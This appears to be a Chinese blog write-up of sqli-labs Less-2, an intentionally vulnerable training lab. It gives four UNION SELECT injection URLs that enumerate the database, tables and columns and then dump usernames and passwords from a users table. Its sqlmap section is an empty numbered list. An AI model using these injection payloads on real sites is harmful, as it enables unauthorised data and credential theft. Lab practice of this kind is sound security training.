当前位置:网站首页>sqli_libsLess-2 GET - Error based - Intiger based (基于错误的GET整型注入)
sqli_libsLess-2 GET - Error based - Intiger based (基于错误的GET整型注入)
2022-08-08 21:59:00 【XLXLXL.】
Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
1 hackbar注入
输入‘发现页面出错 此处应该有sql注入
通过比较可以得出此处是整型注入
然后进行union联合查询
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,database() --+
查出库的名称是security
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security‘ --+
对user表进行处理
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = ‘users’–+
对username password进行处理
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(‘用户名:’,username,‘密码:’,password) from users --+
拿到数据 结束
2 .sqlmap使用
1
2
3 
4
5.
拿到数据 结束
边栏推荐
猜你喜欢
随机推荐
AutoAssign论文解析
嵌入式开发:提示和技巧——C 语言中要避免的8个保留字
Zero Digital Reports Digital Financial Innovation to the Secretary of Hainan Provincial Party Committee
汤加火山爆发引发跨洋海啸?数据可视化告诉你真实威力!
Chrome代理管理器插件
cordova sqlite的链接
2020上海智慧城市合作大会,零数科技受邀出席并入选优秀应用案例
百度 IP 查询
U盘无法在电脑上显示
"New Infrastructure of Cultural Digital Strategy and Ecological Construction of Cultural Art Chain" was successfully held
【硬件通讯协议】SIP总线协议以及模拟(软件)SPI
微服务架构的核心关键点
IPv6 private address
Conformer论文以及代码解析(上)
联合国前副秘书长点赞零数云南落地项目
零数科技深耕苏州,受邀参加中国金融科技产业峰会
打印机的使用
2020-03-09
software design principles
混合办公说来就来,你找到适合的安全防护产品了么